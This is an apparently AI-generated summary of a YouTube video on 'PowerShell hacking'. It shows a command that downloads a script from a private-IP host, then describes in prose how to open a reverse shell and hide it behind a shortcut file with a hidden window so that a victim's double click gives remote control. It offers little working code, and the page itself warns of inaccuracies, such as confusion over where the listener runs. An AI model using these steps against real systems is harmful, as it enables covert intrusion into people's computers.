Loi Liang Yang Watch on YouTube

PowerShell Hacking

3 min read 7 months ago
Published on May 03, 2024 This response is partially generated with the help of AI. It may contain inaccuracies.

Table of Contents

Step-by-Step Tutorial: PowerShell Hacking

Introduction:

In this tutorial, we will explore PowerShell hacking techniques demonstrated in the video "Great Power Comes Great Responsibility - PowerShell Hacking" by Loi Liang Yang. We will learn how to utilize PowerShell to run scripts, create files, download files, and gain command execution in a target server.

Step 1: Launch PowerShell on Windows Machine

  1. Go to the bottom left corner of the Windows machine.
  2. Enter "PowerShell" in the search bar and hit Enter.
  3. This will open the Windows PowerShell where you can write and execute scripts.

Step 2: Create a New File Using PowerShell

  1. In the PowerShell window, enter the following command to create a new file:
    new-item -path .\ -name newfile.txt -itemtype file
  2. This command will create a new file named "newfile.txt" in the current directory.

Step 3: Download a File from a Web Server

  1. Use the command Invoke-WebRequest to download a file from a web server.
  2. For example, to download a file named "default.ps1" from a specific URL to your desktop, use the following command:
    Invoke-WebRequest -Uri http://192.168.0.192/d4.ps1 -OutFile C:\Users\Desktop\default.ps1
  3. This command will download the file to the specified location.

Step 4: Set Up a Reverse Shell

  1. Use wget command to target a PowerShell script that provides a reverse shell.
  2. Copy the downloaded file to a specific directory on the target machine.
  3. Execute the downloaded file using PowerShell to establish a reverse shell connection.

Step 5: Execute the Reverse Shell

  1. Enter the command to execute the downloaded file and establish a reverse shell connection.
  2. Specify the listener IP and port to connect to.
  3. Execute the command to establish the reverse shell connection.

Step 6: Create a Shortcut File for PowerShell Execution

  1. Create a shortcut file with PowerShell execution instructions.
  2. Modify the target of the shortcut file to execute PowerShell commands.
  3. Double click on the shortcut file to execute the PowerShell commands and establish a connection.

Step 7: Hide the PowerShell Window

  1. Modify the shortcut file properties to hide the PowerShell window when executing commands.
  2. Use the -WindowStyle Hidden parameter to hide the window.
  3. Apply the changes and execute the shortcut file.

Step 8: Verify the Reverse Shell Connection

  1. Set up the listener again on the target machine.
  2. Double click on the modified shortcut file to establish a hidden reverse shell connection.
  3. Verify the connection in the command line interface.

By following these steps, you can explore PowerShell hacking techniques and understand how to gain control and execute commands on a target system using PowerShell. Remember to use this knowledge for ethical purposes only.

Table of Contents

Recent